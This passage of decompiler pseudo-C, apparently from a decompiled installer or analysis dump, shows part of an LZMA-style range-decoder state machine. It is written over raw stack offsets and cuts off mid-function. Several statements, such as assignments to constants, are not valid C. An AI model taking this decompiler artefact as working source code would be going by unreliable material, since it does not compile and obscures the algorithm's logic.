                                            												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                            												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                            												__eflags =  *(__ebp - 0x38) - 4;
                                            												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                            												if( *(__ebp - 0x38) >= 4) {
                                            													__eflags =  *(__ebp - 0x38) - 0xa;
                                            													if( *(__ebp - 0x38) >= 0xa) {
                                            														_t98 = __ebp - 0x38;
                                            														 *_t98 =  *(__ebp - 0x38) - 6;
                                            														__eflags =  *_t98;
                                            													} else {
                                            														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                            													}
                                            												} else {
                                            													 *(__ebp - 0x38) = 0;
                                            												}
                                            												__eflags =  *(__ebp - 0x34) - __edx;
                                            												if( *(__ebp - 0x34) == __edx) {
                                            													__ebx = 0;
                                            													__ebx = 1;
                                            													goto L61;
                                            												} else {
                                            													__eax =  *(__ebp - 0x14);
                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            													__eflags = __eax -  *(__ebp - 0x74);
                                            													if(__eax >=  *(__ebp - 0x74)) {
                                            														__eax = __eax +  *(__ebp - 0x74);
                                            														__eflags = __eax;
                                            													}
                                            													__ecx =  *(__ebp - 8);
                                            													__ebx = 0;
                                            													__ebx = 1;
                                            													__al =  *((intOrPtr*)(__eax + __ecx));
                                            													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                            													goto L41;
                                            												}
                                            											case 7:
                                            												__eflags =  *(__ebp - 0x40) - 1;
                                            												if( *(__ebp - 0x40) != 1) {
                                            													__eax =  *(__ebp - 0x24);
                                            													 *(__ebp - 0x80) = 0x16;
                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            													__eax =  *(__ebp - 0x28);
                                            													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            													__eax =  *(__ebp - 0x2c);
                                            													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                            													__eax = 0;
                                            													__eflags =  *(__ebp - 0x38) - 7;
                                            													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            													__al = __al & 0x000000fd;
                                            													__eax = (__eflags >= 0) - 1 + 0xa;
                                            													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                            													__eax =  *(__ebp - 4);
                                            													__eax =  *(__ebp - 4) + 0x664;
                                            													__eflags = __eax;
                                            													 *(__ebp - 0x58) = __eax;
                                            													goto L69;
                                            												}
                                            												__eax =  *(__ebp - 4);
                                            												__ecx =  *(__ebp - 0x38);
                                            												 *(__ebp - 0x84) = 8;
                                            												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                            												while(1) {
                                            													L132:
                                            													 *(_t613 - 0x54) = _t606;
                                            													goto L133;
                                            												}
                                            											case 8:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 4);
                                            													__ecx =  *(__ebp - 0x38);
                                            													 *(__ebp - 0x84) = 0xa;
                                            													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                            												} else {
                                            													__eax =  *(__ebp - 0x38);
                                            													__ecx =  *(__ebp - 4);
                                            													__eax =  *(__ebp - 0x38) + 0xf;
                                            													 *(__ebp - 0x84) = 9;
                                            													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                            													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                            												}
                                            												while(1) {
                                            													L132:
                                            													 *(_t613 - 0x54) = _t606;
                                            													goto L133;
                                            												}
                                            											case 9:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													goto L89;
                                            												}
                                            												__eflags =  *(__ebp - 0x60);
                                            												if( *(__ebp - 0x60) == 0) {
                                            													goto L171;
                                            												}
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                            												__eflags = _t259;
                                            												0 | _t259 = _t259 + _t259 + 9;
                                            												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                            												goto L76;
                                            											case 0xa:
                                            												goto L0;
                                            											case 0xb:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__ecx =  *(__ebp - 0x24);
                                            													__eax =  *(__ebp - 0x20);
                                            													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                            												} else {
                                            													__eax =  *(__ebp - 0x24);
                                            												}
                                            												__ecx =  *(__ebp - 0x28);
                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                            												goto L88;
                                            											case 0xc:
                                            												L99:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xc;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t334 = __ebp - 0x70;
                                            												 *_t334 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t334;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												__eax =  *(__ebp - 0x2c);
                                            												goto L101;
                                            											case 0xd:
                                            												L37:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xd;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t122 = __ebp - 0x70;
                                            												 *_t122 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t122;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												L39:
                                            												__eax =  *(__ebp - 0x40);
                                            												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                            													goto L48;
                                            												}
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													goto L54;
                                            												}
                                            												L41:
                                            												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                            												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                            												__ecx =  *(__ebp - 0x58);
                                            												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                            												 *(__ebp - 0x48) = __eax;
                                            												__eax = __eax + 1;
                                            												__eax = __eax << 8;
                                            												__eax = __eax + __ebx;
                                            												__esi =  *(__ebp - 0x58) + __eax * 2;
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edx = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													 *(__ebp - 0x40) = 1;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													__ebx = __ebx + __ebx + 1;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edx;
                                            													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													goto L39;
                                            												} else {
                                            													goto L37;
                                            												}
                                            											case 0xe:
                                            												L46:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xe;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t156 = __ebp - 0x70;
                                            												 *_t156 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t156;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												while(1) {
                                            													L48:
                                            													__eflags = __ebx - 0x100;
                                            													if(__ebx >= 0x100) {
                                            														break;
                                            													}
                                            													__eax =  *(__ebp - 0x58);
                                            													__edx = __ebx + __ebx;
                                            													__ecx =  *(__ebp - 0x10);
                                            													__esi = __edx + __eax;
                                            													__ecx =  *(__ebp - 0x10) >> 0xb;
                                            													__ax =  *__esi;
                                            													 *(__ebp - 0x54) = __esi;
                                            													__edi = __ax & 0x0000ffff;
                                            													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            													__eflags =  *(__ebp - 0xc) - __ecx;
                                            													if( *(__ebp - 0xc) >= __ecx) {
                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            														__cx = __ax;
                                            														_t170 = __edx + 1; // 0x1
                                            														__ebx = _t170;
                                            														__cx = __ax >> 5;
                                            														__eflags = __eax;
                                            														 *__esi = __ax;
                                            													} else {
                                            														 *(__ebp - 0x10) = __ecx;
                                            														0x800 = 0x800 - __edi;
                                            														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            														__ebx = __ebx + __ebx;
                                            														 *__esi = __cx;
                                            													}
                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            													 *(__ebp - 0x44) = __ebx;
                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                            														continue;
                                            													} else {
                                            														goto L46;
                                            													}
                                            												}
                                            												L54:
                                            												_t173 = __ebp - 0x34;
                                            												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                            												__eflags =  *_t173;
                                            												goto L55;
                                            											case 0xf:
                                            												L58:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0xf;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t203 = __ebp - 0x70;
                                            												 *_t203 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t203;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												L60:
                                            												__eflags = __ebx - 0x100;
                                            												if(__ebx >= 0x100) {
                                            													L55:
                                            													__al =  *(__ebp - 0x44);
                                            													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                            													goto L56;
                                            												}
                                            												L61:
                                            												__eax =  *(__ebp - 0x58);
                                            												__edx = __ebx + __ebx;
                                            												__ecx =  *(__ebp - 0x10);
                                            												__esi = __edx + __eax;
                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                            												__ax =  *__esi;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													_t217 = __edx + 1; // 0x1
                                            													__ebx = _t217;
                                            													__cx = __ax >> 5;
                                            													__eflags = __eax;
                                            													 *__esi = __ax;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													__ebx = __ebx + __ebx;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												 *(__ebp - 0x44) = __ebx;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													goto L60;
                                            												} else {
                                            													goto L58;
                                            												}
                                            											case 0x10:
                                            												L109:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0x10;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t365 = __ebp - 0x70;
                                            												 *_t365 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t365;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												goto L111;
                                            											case 0x11:
                                            												goto L69;
                                            											case 0x12:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													__eax =  *(__ebp - 0x58);
                                            													 *(__ebp - 0x84) = 0x13;
                                            													__esi =  *(__ebp - 0x58) + 2;
                                            													while(1) {
                                            														L132:
                                            														 *(_t613 - 0x54) = _t606;
                                            														goto L133;
                                            													}
                                            												}
                                            												__eax =  *(__ebp - 0x4c);
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                            												__ecx =  *(__ebp - 0x58);
                                            												__eax =  *(__ebp - 0x4c) << 4;
                                            												__eflags = __eax;
                                            												__eax =  *(__ebp - 0x58) + __eax + 4;
                                            												goto L130;
                                            											case 0x13:
                                            												__eflags =  *(__ebp - 0x40);
                                            												if( *(__ebp - 0x40) != 0) {
                                            													_t469 = __ebp - 0x58;
                                            													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                            													__eflags =  *_t469;
                                            													 *(__ebp - 0x30) = 0x10;
                                            													 *(__ebp - 0x40) = 8;
                                            													L144:
                                            													 *(__ebp - 0x7c) = 0x14;
                                            													goto L145;
                                            												}
                                            												__eax =  *(__ebp - 0x4c);
                                            												__ecx =  *(__ebp - 0x58);
                                            												__eax =  *(__ebp - 0x4c) << 4;
                                            												 *(__ebp - 0x30) = 8;
                                            												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                            												L130:
                                            												 *(__ebp - 0x58) = __eax;
                                            												 *(__ebp - 0x40) = 3;
                                            												goto L144;
                                            											case 0x14:
                                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                            												__eax =  *(__ebp - 0x80);
                                            												 *(_t613 - 0x88) = _t533;
                                            												goto L1;
                                            											case 0x15:
                                            												__eax = 0;
                                            												__eflags =  *(__ebp - 0x38) - 7;
                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                            												__al = __al & 0x000000fd;
                                            												__eax = (__eflags >= 0) - 1 + 0xb;
                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                            												goto L120;
                                            											case 0x16:
                                            												__eax =  *(__ebp - 0x30);
                                            												__eflags = __eax - 4;
                                            												if(__eax >= 4) {
                                            													_push(3);
                                            													_pop(__eax);
                                            												}
                                            												__ecx =  *(__ebp - 4);
                                            												 *(__ebp - 0x40) = 6;
                                            												__eax = __eax << 7;
                                            												 *(__ebp - 0x7c) = 0x19;
                                            												 *(__ebp - 0x58) = __eax;
                                            												goto L145;
                                            											case 0x17:
                                            												L145:
                                            												__eax =  *(__ebp - 0x40);
                                            												 *(__ebp - 0x50) = 1;
                                            												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                            												goto L149;
                                            											case 0x18:
                                            												L146:
                                            												__eflags =  *(__ebp - 0x6c);
                                            												if( *(__ebp - 0x6c) == 0) {
                                            													 *(__ebp - 0x88) = 0x18;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x70);
                                            												__eax =  *(__ebp - 0xc);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                            												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                            												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												_t484 = __ebp - 0x70;
                                            												 *_t484 =  *(__ebp - 0x70) + 1;
                                            												__eflags =  *_t484;
                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                            												L148:
                                            												_t487 = __ebp - 0x48;
                                            												 *_t487 =  *(__ebp - 0x48) - 1;
                                            												__eflags =  *_t487;
                                            												L149:
                                            												__eflags =  *(__ebp - 0x48);
                                            												if( *(__ebp - 0x48) <= 0) {
                                            													__ecx =  *(__ebp - 0x40);
                                            													__ebx =  *(__ebp - 0x50);
                                            													0 = 1;
                                            													__eax = 1 << __cl;
                                            													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                            													__eax =  *(__ebp - 0x7c);
                                            													 *(__ebp - 0x44) = __ebx;
                                            													while(1) {
                                            														 *(_t613 - 0x88) = _t533;
                                            														goto L1;
                                            													}
                                            												}
                                            												__eax =  *(__ebp - 0x50);
                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            												__eax =  *(__ebp - 0x58);
                                            												__esi = __edx + __eax;
                                            												 *(__ebp - 0x54) = __esi;
                                            												__ax =  *__esi;
                                            												__edi = __ax & 0x0000ffff;
                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                            												if( *(__ebp - 0xc) >= __ecx) {
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                            													__cx = __ax;
                                            													__cx = __ax >> 5;
                                            													__eax = __eax - __ecx;
                                            													__edx = __edx + 1;
                                            													__eflags = __edx;
                                            													 *__esi = __ax;
                                            													 *(__ebp - 0x50) = __edx;
                                            												} else {
                                            													 *(__ebp - 0x10) = __ecx;
                                            													0x800 = 0x800 - __edi;
                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                            													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            													 *__esi = __cx;
                                            												}
                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                            													goto L148;
                                            												} else {
                                            													goto L146;
                                            												}
                                            											case 0x19:
                                            												__eflags = __ebx - 4;
                                            												if(__ebx < 4) {
                                            													 *(__ebp - 0x2c) = __ebx;
                                            													L119:
                                            													_t393 = __ebp - 0x2c;
                                            													 *_t393 =  *(__ebp - 0x2c) + 1;
                                            													__eflags =  *_t393;
                                            													L120:
                                            													__eax =  *(__ebp - 0x2c);
                                            													__eflags = __eax;
                                            													if(__eax == 0) {
                                            														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                            														goto L170;
                                            													}
                                            													__eflags = __eax -  *(__ebp - 0x60);
                                            													if(__eax >  *(__ebp - 0x60)) {
                                            														goto L171;
                                            													}
                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                            													__eax =  *(__ebp - 0x30);
                                            													_t400 = __ebp - 0x60;
                                            													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                            													__eflags =  *_t400;
                                            													goto L123;
                                            												}
                                            												__ecx = __ebx;
                                            												__eax = __ebx;
                                            												__ecx = __ebx >> 1;
                                            												__eax = __ebx & 0x00000001;
                                            												__ecx = (__ebx >> 1) - 1;
                                            												__al = __al | 0x00000002;
                                            												__eax = (__ebx & 0x00000001) << __cl;
                                            												__eflags = __ebx - 0xe;
                                            												 *(__ebp - 0x2c) = __eax;
                                            												if(__ebx >= 0xe) {
                                            													__ebx = 0;
                                            													 *(__ebp - 0x48) = __ecx;
                                            													L102:
                                            													__eflags =  *(__ebp - 0x48);
                                            													if( *(__ebp - 0x48) <= 0) {
                                            														__eax = __eax + __ebx;
                                            														 *(__ebp - 0x40) = 4;
                                            														 *(__ebp - 0x2c) = __eax;
                                            														__eax =  *(__ebp - 4);
                                            														__eax =  *(__ebp - 4) + 0x644;
                                            														__eflags = __eax;
                                            														L108:
                                            														__ebx = 0;
                                            														 *(__ebp - 0x58) = __eax;
                                            														 *(__ebp - 0x50) = 1;
                                            														 *(__ebp - 0x44) = 0;
                                            														 *(__ebp - 0x48) = 0;
                                            														L112:
                                            														__eax =  *(__ebp - 0x40);
                                            														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                            														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                            															_t391 = __ebp - 0x2c;
                                            															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                            															__eflags =  *_t391;
                                            															goto L119;
                                            														}
                                            														__eax =  *(__ebp - 0x50);
                                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                            														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                            														__eax =  *(__ebp - 0x58);
                                            														__esi = __edi + __eax;
                                            														 *(__ebp - 0x54) = __esi;
                                            														__ax =  *__esi;
                                            														__ecx = __ax & 0x0000ffff;
                                            														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                            														__eflags =  *(__ebp - 0xc) - __edx;
                                            														if( *(__ebp - 0xc) >= __edx) {
                                            															__ecx = 0;
                                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                            															__ecx = 1;
                                            															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                            															__ebx = 1;
                                            															__ecx =  *(__ebp - 0x48);
                                            															__ebx = 1 << __cl;
                                            															__ecx = 1 << __cl;
                                            															__ebx =  *(__ebp - 0x44);
                                            															__ebx =  *(__ebp - 0x44) | __ecx;
                                            															__cx = __ax;
                                            															__cx = __ax >> 5;
                                            															__eax = __eax - __ecx;
                                            															__edi = __edi + 1;
                                            															__eflags = __edi;
                                            															 *(__ebp - 0x44) = __ebx;
                                            															 *__esi = __ax;
                                            															 *(__ebp - 0x50) = __edi;
                                            														} else {
                                            															 *(__ebp - 0x10) = __edx;
                                            															0x800 = 0x800 - __ecx;
                                            															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                            															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                            															 *__esi = __dx;
                                            														}
                                            														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            														if( *(__ebp - 0x10) >= 0x1000000) {
                                            															L111:
                                            															_t368 = __ebp - 0x48;
                                            															 *_t368 =  *(__ebp - 0x48) + 1;
                                            															__eflags =  *_t368;
                                            															goto L112;
                                            														} else {
                                            															goto L109;
                                            														}
                                            													}
                                            													__ecx =  *(__ebp - 0xc);
                                            													__ebx = __ebx + __ebx;
                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                            													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            													 *(__ebp - 0x44) = __ebx;
                                            													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                            														__ecx =  *(__ebp - 0x10);
                                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                            														__ebx = __ebx | 0x00000001;
                                            														__eflags = __ebx;
                                            														 *(__ebp - 0x44) = __ebx;
                                            													}
                                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                            														L101:
                                            														_t338 = __ebp - 0x48;
                                            														 *_t338 =  *(__ebp - 0x48) - 1;
                                            														__eflags =  *_t338;
                                            														goto L102;
                                            													} else {
                                            														goto L99;
                                            													}
                                            												}
                                            												__edx =  *(__ebp - 4);
                                            												__eax = __eax - __ebx;
                                            												 *(__ebp - 0x40) = __ecx;
                                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                            												goto L108;
                                            											case 0x1a:
                                            												L56:
                                            												__eflags =  *(__ebp - 0x64);
                                            												if( *(__ebp - 0x64) == 0) {
                                            													 *(__ebp - 0x88) = 0x1a;
                                            													goto L170;
                                            												}
                                            												__ecx =  *(__ebp - 0x68);
                                            												__al =  *(__ebp - 0x5c);
                                            												__edx =  *(__ebp - 8);
                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                            												 *( *(__ebp - 0x68)) = __al;
                                            												__ecx =  *(__ebp - 0x14);
                                            												 *(__ecx +  *(__ebp - 8)) = __al;
                                            												__eax = __ecx + 1;
                                            												__edx = 0;
                                            												_t192 = __eax %  *(__ebp - 0x74);
                                            												__eax = __eax /  *(__ebp - 0x74);
                                            												__edx = _t192;
                                            												goto L80;
                                            											case 0x1b:
                                            												L76:
                                            												__eflags =  *(__ebp - 0x64);
                                            												if( *(__ebp - 0x64) == 0) {
                                            													 *(__ebp - 0x88) = 0x1b;
                                            													goto L170;
                                            												}
                                            												__eax =  *(__ebp - 0x14);
                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                            												__eflags = __eax -  *(__ebp - 0x74);
                                            												if(__eax >=  *(__ebp - 0x74)) {
                                            													__eax = __eax +  *(__ebp - 0x74);
                                            													__eflags = __eax;
                                            												}
                                            												__edx =  *(__ebp - 8);
                                            												__cl =  *(__eax + __edx);
                                            												__eax =  *(__ebp - 0x14);
                                            												 *(__ebp - 0x5c) = __cl;
                                            												 *(__eax + __edx) = __cl;
                                            												__eax = __eax + 1;
                                            												__edx = 0;
                                            												_t275 = __eax %  *(__ebp - 0x74);
                                            												__eax = __eax /  *(__ebp - 0x74);
                                            												__edx = _t275;
                                            												__eax =  *(__ebp - 0x68);
                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                            												_t284 = __ebp - 0x64;
                                            												 *_t284 =  *(__ebp - 0x64) - 1;
                                            												__eflags =  *_t284;
                                            												 *( *(__ebp - 0x68)) = __cl;
                                            												L80:
                                            												 *(__ebp - 0x14) = __edx;
                                            												goto L81;
                                            											case 0x1c:
                                            												while(1) {
                                            													L123:
